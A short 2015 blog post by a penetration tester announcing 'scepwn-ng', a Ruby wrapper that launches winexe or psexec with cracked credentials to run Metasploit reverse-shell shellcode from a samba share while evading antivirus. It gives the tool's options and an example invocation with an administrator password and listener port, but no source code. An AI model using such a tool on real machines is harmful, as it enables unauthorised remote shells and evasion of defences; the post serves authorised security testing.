i.crave.beer – The online home of Joshua Skorich

27th May 2015


scepwn-ng is a wrapper script for launching winexe/psexec at a target, which then runs shellcode exec from a samba share with a msf generated reverse shell. As the executable never touches disk, it is highly effective at evading a/v.

Layer 2 attacks are highly effective in most environments, and credentials are often cracked within the first few hours of an engagement. This tool was developed to simplify the task of going from credentials to a shell on a target machine.

scepwn-ng is based on my previous project 'scepwn', however has been completely rewritten in ruby for the future goal of cross-platform support. In an effort to release the new features (psexec integration, port selection), I have released prior to adding support for additional platforms.

Keep an eye on GitHub for updates.

Usage: scepwn-ng.rb [options]
-t, --target TARGET Target IP address
-u, --user CREDENTIALS Credentials in DOMAIN/USERNAME%PASSWORD format
-p, --port PORT Reverse shell port number (default: 443)
-s, --service SERVICE winexe or psexec (default: winexe)
-h, --help Display this screen

Example: scepwn-ng.rb -u 'Administrator%Password1' -t -s psexec -p 4444